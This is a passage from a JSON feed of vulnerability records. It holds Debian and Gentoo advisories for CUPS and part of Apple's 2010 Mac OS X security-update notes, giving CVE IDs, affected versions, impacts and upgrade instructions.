http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : cups\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2008-5183 CVE-2009-3553 CVE-2010-0540 CVE-2010-0542 CVE-2010-1748 CVE-2010-2431 
CVE-2010-2432 CVE-2010-2941\n\nSeveral vulnerabilities have been discovered in the Common UNIX Printing\nSystem:\n\nCVE-2008-5183\n\n A null pointer dereference in RSS job completion notifications\n could lead to denial of service.\n\nCVE-2009-3553\n\n It was discovered that incorrect file descriptor handling\n could lead to denial of service.\n\nCVE-2010-0540\n\n A cross-site request forgery vulnerability was discovered in\n the web interface.\n\nCVE-2010-0542\n\n Incorrect memory management in the filter subsystem could lead\n to denial of service.\n\nCVE-2010-1748\n\n Information disclosure in the web interface.\n \nCVE-2010-2431\n \n Emmanuel Bouillon discovered a symlink vulnerability in handling\n of cache files.\n\nCVE-2010-2432\n\n Denial of service in the authentication code.\n\nCVE-2010-2941\n\n Incorrect memory management in the IPP code could lead to denial\n of service or the execution of arbitrary code.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.3.8-1+lenny9.\n\nThe stable distribution (squeeze) and the unstable distribution (sid)\nhad already been fixed prior to the initial Squeeze release.\n\nWe recommend that you upgrade your cups packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2011-03-01T23:30:56", "published": "2011-03-01T23:30:56", "id": "DEBIAN:DSA-2176-1:CBD37", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00043.html", "title": "[SECURITY] [DSA 2176-1] cups security update", "type": "debian", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:11", "bulletinFamily": "unix", "description": "### Background\n\nCUPS, the Common Unix Printing 
System, is a full-featured print server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in CUPS. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary code using specially crafted streams, IPP requests or files, or cause a Denial of Service (daemon crash or hang). A local attacker may be able to gain escalated privileges or overwrite arbitrary files. Furthermore, a remote attacker may be able to obtain sensitive information from the CUPS process or hijack a CUPS administrator authentication request. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll CUPS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-print/cups-1.4.8-r1\"\n \n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are available since September 03, 2011. It is likely that your system is already no longer affected by this issue.", "modified": "2012-07-09T00:00:00", "published": "2012-07-09T00:00:00", "id": "GLSA-201207-10", "href": "https://security.gentoo.org/glsa/201207-10", "type": "gentoo", "title": "CUPS: Multiple vulnerabilities", "cvss": {"score": 7.9, "vector": "AV:ADJACENT_NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:39", "bulletinFamily": "software", "description": "Multiple vulnerabilities in kernel, networking components, printing services, AFP Server, AppKit, Apple Type Services, CFNetwork, CoreGraphics, CoreText, Directory Services, diskdev_cmds, Disk Images, Image Capture, ImageIO, Image RAW, Password Server, QuickLook, QuickTime, Safari RSS, Time Machine, Wiki Server, X11 and third party applications.", "modified": "2013-11-18T00:00:00", "published": "2013-11-18T00:00:00", "id": "SECURITYVULNS:VULN:11263", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11263", "title": "Apple Mac OS X 
and QuickTime multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "bulletinFamily": "software", "description": "About the security content of Mac OS X v10.6.5 and Security Update 2010-007\r\n\r\n * Last Modified: November 12, 2010\r\n * Article: HT4435\r\n\r\nSummary\r\n\r\nThis document describes the security content of Mac OS X v10.6.5 and Security Update 2010-007, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.\r\n\r\nFor the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the Apple Product Security website.\r\n\r\nFor information about the Apple Product Security PGP Key, see \"How to use the Apple Product Security PGP Key.\"\r\n\r\nWhere possible, CVE IDs are used to reference the vulnerabilities for further information.\r\n\r\nTo learn about other Security Updates, see \"Apple Security Updates.\"\r\nProducts Affected\r\n\r\nMac OS X 10.6, Product Security, Security Update 2010-007, Mac OS X v10.6.\r\nMac OS X v10.6.5 and Security Update 2010-007\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1828\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause AFP Server to unexpectedly shutdown\r\n\r\n Description: A null pointer dereference exists in AFP Server's handling of reconnect authentication packets. A remote attacker may cause AFP Server to unexpectedly shutdown. Mac OS X automatically restarts AFP Server after a shutdown. This issue is addressed through improved validation of reconnect packets.
Credit: Apple.\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1829\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: An authenticated user may cause arbitrary code execution\r\n\r\n Description: A directory traversal issue exists in AFP Server, which may allow an authenticated user to create files outside of a share with the permissions of the user. With a system configuration where users are permitted file sharing access only, this may lead to arbitrary code execution. This issue is addressed through improved path validation. Credit: Apple.\r\n\r\n *\r\n\r\n AFP Server\r\n\r\n CVE-ID: CVE-2010-1830\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may determine the existence of an AFP share\r\n\r\n Description: An error handling issue exists in AFP Server. This may allow a remote attacker to determine the existence of an AFP share with a given name. This issue is addressed through improved signaling of error conditions. Credit: Apple.\r\n\r\n *\r\n\r\n Apache mod_perl\r\n\r\n CVE-ID: CVE-2009-0796\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause cross-site scripting against the web server\r\n\r\n Description: A cross-site scripting issue exists in Apache mod_perl's encoding of HTML output for the /perl-status page. An attacker may leverage this issue to inject arbitrary script code in the context of a web site served by Apache. This issue does not affect the default configuration as mod_perl and its status page are not enabled by default. 
This issue is addressed by properly escaping HTML output.\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2010-0408, CVE-2010-0434\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in Apache 2.2.14\r\n\r\n Description: Apache is updated to version 2.2.15 to address several vulnerabilities, the most serious of which may lead to a denial of service. Further information is available via the Apache web site at http://httpd.apache.org/\r\n\r\n *\r\n\r\n AppKit\r\n\r\n CVE-ID: CVE-2010-1842\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Rendering a bidirectional string that requires truncation may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in AppKit. If a string containing bidirectional text is rendered, and it is truncated with an ellipsis, AppKit may apply an inappropriate layout calculation. This could lead to an unexpected application termination or arbitrary code execution. This issue is addressed by avoiding the inappropriate layout calculation. Credit to Jesse Ruderman of Mozilla Corporation for reporting this issue.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1831\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A buffer overflow exists in Apple Type Services' handling of embedded fonts with long names. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. 
This issue is addressed through improved bounds checking.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1832\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Apple Type Services' handling of embedded fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. On Mac OS X v10.6 systems this issue is mitigated by the -fstack-protector compiler flag. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-1833\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in Apple Type Services' handling of embedded fonts. Viewing or downloading a document containing a maliciously crafted embedded font may lead to arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Marc Schoenefeld of Red Hat, and Christoph Diehl of Mozilla for reporting this issue.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2010-4010\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution\r\n\r\n Description: A signedness issue exists in Apple Type Services' handling of Compact Font Format (CFF) fonts. Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution. 
This issue is addressed through improved handling of CFF fonts. This issue does not affect Mac OS X v10.6 systems. Credit to Matias Eissler and Anibal Sacco of Core Security Technologies for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2010-1752\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack overflow exists in CFNetwork's URL handling code. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Laurent OUDOT of TEHTRI-Security, and Neil Fryer of IT Security Geeks for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2010-1834\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Visiting a maliciously crafted website may cause cookies to be set for other sites\r\n\r\n Description: An implementation issue exists in CFNetwork's handling of domain specifications in cookies. CFNetwork allows cookies to be set for a partial IP address. A maliciously crafted website may set a cookie that will be sent to a third-party site, if the third-party site is accessed by IP address. This update addresses the issue through improved validation of domains specified in cookies.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2010-1836\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in CoreGraphics' handling of PDF files.
Opening a maliciously crafted PDF file may lead to an unexpected application termination. On 32-bit systems, it may also lead to arbitrary code execution. This update addresses the issues through improved bounds and error checking. Credit to Andrew Kiss for reporting this issue.\r\n\r\n *\r\n\r\n CoreText\r\n\r\n CVE-ID: CVE-2010-1837\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in CoreText's handling of font files. Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of font files. Credit: Apple.\r\n\r\n *\r\n\r\n CUPS\r\n\r\n CVE-ID: CVE-2010-2941\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in the handling of Internet Printing Protocol (IPP) requests in CUPS. By sending a maliciously crafted IPP request, a remote attacker may cause an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management. This issue may only be triggered remotely on systems with Printer Sharing enabled. Printer Sharing is not enabled by default. 
Credit to Emmanuel Bouillon of NATO C3 Agency for reporting this issue.\r\n\r\n *\r\n\r\n Directory Services\r\n\r\n CVE-ID: CVE-2010-1838\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local attacker may bypass the password validation and log in to a mobile account\r\n\r\n Description: An error handling issue exists in Directory Service. A local attacker with knowledge of the name of a disabled mobile account, or a mobile account that allows a limited number of login failures, may bypass the password validation and log in to the account. This issue is addressed through improved handling of disabled accounts.\r\n\r\n *\r\n\r\n Directory Services\r\n\r\n CVE-ID: CVE-2010-1840\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: An attacker may be able to cause an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Directory Services' password validation. An attacker may be able to cause an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT), and Rainer Mueller for reporting this issue.\r\n\r\n *\r\n\r\n diskdev_cmds\r\n\r\n CVE-ID: CVE-2010-0105\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local user may be able to prevent the system from starting properly\r\n\r\n Description: An implementation issue exists in fsck_hfs' handling of directory trees. A local user may be able to prevent the system from starting properly. This issue is addressed through improved validation of directory trees.
Credit to Maksymilian Arciemowicz of SecurityReason for reporting this issue.\r\n\r\n *\r\n\r\n Disk Images\r\n\r\n CVE-ID: CVE-2010-1841\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Opening a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in processing UDIF disk images. Opening a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of UDIF disk images. Credit to Marc Schoenefeld of Red Hat for reporting this issue.\r\n\r\n *\r\n\r\n Flash Player plug-in\r\n\r\n CVE-ID: CVE-2008-4546, CVE-2009-3793, CVE-2010-0209, CVE-2010-1297, CVE-2010-2160, CVE-2010-2161, CVE-2010-2162, CVE-2010-2163, CVE-2010-2164, CVE-2010-2165, CVE-2010-2166, CVE-2010-2167, CVE-2010-2169, CVE-2010-2170, CVE-2010-2171, CVE-2010-2172, CVE-2010-2173, CVE-2010-2174, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2179, CVE-2010-2180, CVE-2010-2181, CVE-2010-2182, CVE-2010-2183, CVE-2010-2184, CVE-2010-2185, CVE-2010-2186, CVE-2010-2187, CVE-2010-2189, CVE-2010-2188, CVE-2010-2213, CVE-2010-2214, CVE-2010-2215, CVE-2010-2216, CVE-2010-2884, CVE-2010-3636, CVE-2010-3638, CVE-2010-3639, CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, CVE-2010-3652, CVE-2010-3654, CVE-2010-3976\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in Adobe Flash Player plug-in\r\n\r\n Description: Multiple issues exist in the Adobe Flash Player plug-in, the most serious of which may lead to arbitrary code execution. 
The issues are addressed by updating the Flash Player plug-in to version 10.1.102.64. Further information is available via the Adobe web site at http://www.adobe.com/support/security/\r\n\r\n *\r\n\r\n gzip\r\n\r\n CVE-ID: CVE-2010-0001\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer overflow exists in gzip's handling of archives that use LZW compression. Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.6. Credit to Aki Helin of the Oulu University Secure Programming Group for reporting this issue.\r\n\r\n *\r\n\r\n gzip\r\n\r\n CVE-ID: CVE-2009-2624\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in gzip. Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n Image Capture\r\n\r\n CVE-ID: CVE-2010-1844\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted image may lead to an unexpected system shutdown\r\n\r\n Description: An unbounded memory consumption issue exists in Image Capture. Downloading a maliciously crafted image may lead to an unexpected system shutdown. This issue is addressed through improved input validation. This issue does not affect systems prior to Mac OS X v10.6.
Credit to Steven Fisher of Discovery Software Ltd. for reporting this issue.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-1845\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in ImageIO's handling of PSD images. Viewing a maliciously crafted PSD image may lead to an unexpected application termination or arbitrary code execution. These issues are addressed through improved validation of PSD images. Credit to Dominic Chell of NGSSoftware for reporting one of these issues.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-1811\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in the handling of TIFF Images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n ImageIO\r\n\r\n CVE-ID: CVE-2010-2249, CVE-2010-1205\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in libpng\r\n\r\n Description: libpng is updated to version 1.4.3 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. 
Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html\r\n\r\n *\r\n\r\n Image RAW\r\n\r\n CVE-ID: CVE-2010-1846\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted RAW image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in Image RAW's handling of images. Viewing a maliciously crafted RAW image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n Kernel\r\n\r\n CVE-ID: CVE-2010-1847\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A local user may cause an unexpected system shutdown\r\n\r\n Description: A memory management issue in the handling of terminal devices may allow a local user to cause an unexpected system shutdown. This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n MySQL\r\n\r\n CVE-ID: CVE-2010-1848, CVE-2010-1849, CVE-2010-1850\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in MySQL 5.0.88\r\n\r\n Description: MySQL is updated to version 5.0.91 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. MySQL is only provided with Mac OS X Server systems. 
Further information is available via the MySQL web site at http://dev.mysql.com/doc/refman/5.0/en/news-5-0-91.html\r\n\r\n *\r\n\r\n neon\r\n\r\n CVE-ID: CVE-2009-2473, CVE-2009-2474\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in neon 0.28.3\r\n\r\n Description: neon is updated to version 0.28.6 to address several vulnerabilities, the most serious of which may allow a man-in-the-middle attacker to redirect connections and intercept user credentials or other sensitive information. Further information is available via the neon web site at http://www.webdav.org/neon/\r\n\r\n *\r\n\r\n Networking\r\n\r\n CVE-ID: CVE-2010-1843\r\n\r\n Available for: Mac OS X v10.6.2 through v10.6.4, Mac OS X Server v10.6.2 through v10.6.4\r\n\r\n Impact: A remote attacker may cause an unexpected system shutdown\r\n\r\n Description: A null pointer dereference issue exists in the handling of Protocol Independent Multicast (PIM) packets. By sending a maliciously crafted PIM packet, a remote attacker may cause an unexpected system shutdown. This issue is addressed through improved validation of PIM packets. This issue does not affect systems prior to Mac OS X v10.6.2. Credit to an anonymous researcher working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n OpenLDAP\r\n\r\n CVE-ID: CVE-2010-0211\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause a denial of service or arbitrary code execution\r\n\r\n Description: A memory management issue exists in OpenLDAP. By sending a maliciously crafted query an attacker may cause a denial of service or arbitrary code execution. 
This issue is addressed through improved memory management.\r\n\r\n *\r\n\r\n OpenLDAP\r\n\r\n CVE-ID: CVE-2010-0212\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may cause a denial of service\r\n\r\n Description: A null pointer dereference exists in OpenLDAP. By sending a maliciously crafted query an attacker may cause a denial of service. This issue is addressed through improved memory management. Credit to Ilkka Mattila and Tuomas Salomaki for reporting this issue.\r\n\r\n *\r\n\r\n OpenSSL\r\n\r\n CVE-ID: CVE-2010-1378\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote user may bypass TLS authentication or spoof a trusted server\r\n\r\n Description: An arithmetic issue exists in OpenSSL's certificate validation. A remote user may bypass certificate validation steps, and cause OpenSSL to accept any certificate signed by a trusted root as valid. This issue is addressed through improved certificate validation. This issue does not affect systems prior to Mac OS X v10.6. This issue only affects the Mac OS X distribution of OpenSSL. Credit to Ryan Govostes of RPISEC for reporting this issue.\r\n\r\n *\r\n\r\n Password Server\r\n\r\n CVE-ID: CVE-2010-3783\r\n\r\n Available for: Mac OS X Server v10.5.8, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: A remote attacker may be able to log in with an outdated password\r\n\r\n Description: An implementation issue in Password Server's handling of replication may cause passwords to not be replicated. A remote attacker may be able to log in to a system using an outdated password. This issue is addressed through improved handling of password replication. This issue only affects Mac OS X Server systems. 
Credit: Apple.\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2010-0397, CVE-2010-2531\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.3.2\r\n\r\n Description: PHP is updated to version 5.3.3 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2010-0397, CVE-2010-2531, CVE-2010-2484\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.2.12\r\n\r\n Description: PHP is updated to version 5.2.14 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n Printing\r\n\r\n CVE-ID: CVE-2010-3784\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Applications that use the PMPageFormatCreateWithDataRepresentation API may be vulnerable to an unexpected application termination\r\n\r\n Description: A null dereference issue exists in the PMPageFormatCreateWithDataRepresentation API's handling of XML data. Applications that use this API may be vulnerable to an unexpected application termination. This issue is addressed through improved handling of XML data. 
Credit to Wujun Li of Microsoft for reporting this issue.\r\n\r\n *\r\n\r\n python\r\n\r\n CVE-ID: CVE-2009-4134, CVE-2010-1449, CVE-2010-1450\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Python applications using the rgbimg and audioop modules may be vulnerable to an unexpected application termination or arbitrary code execution.\r\n\r\n Description: Multiple integer overflows exist in python's rgbimg and audioop modules. Python applications using the rgbimg and audioop modules may be vulnerable to an unexpected application termination or arbitrary code execution. These issues are addressed through improved bounds checking.\r\n\r\n *\r\n\r\n QuickLook\r\n\r\n CVE-ID: CVE-2010-3785\r\n\r\n Available for: Mac OS X v10.5.8, Mac OS X Server v10.5.8, Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A buffer overflow exists in QuickLook's handling of Microsoft Office files. Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n QuickLook\r\n\r\n CVE-ID: CVE-2010-3786\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickLook's handling of Excel files. Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. 
This issue does not affect systems prior to Mac OS X v10.6. Credit to Tobias Klein, working with VeriSign iDefense Labs for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3787\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in QuickTime's handling of JP2 images. Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved bounds checking. Credit to Nils of MWR InfoSecurity for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3788\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An uninitialized memory access issue exists in QuickTime's handling of JP2 images. Viewing a maliciously crafted JP2 image may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved validation of JP2 images. Credit to Damian Put and Procyun, working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n QuickTime\r\n\r\n CVE-ID: CVE-2010-3789\r\n\r\n Available for: Mac OS X v10.6 through v10.6.4, Mac OS X Server v10.6 through v10.6.4\r\n\r\n Impact: Viewing a maliciously crafted avi file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickTime's handling of avi files. Viewing a maliciously crafted avi file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed through improved handling of avi files. 
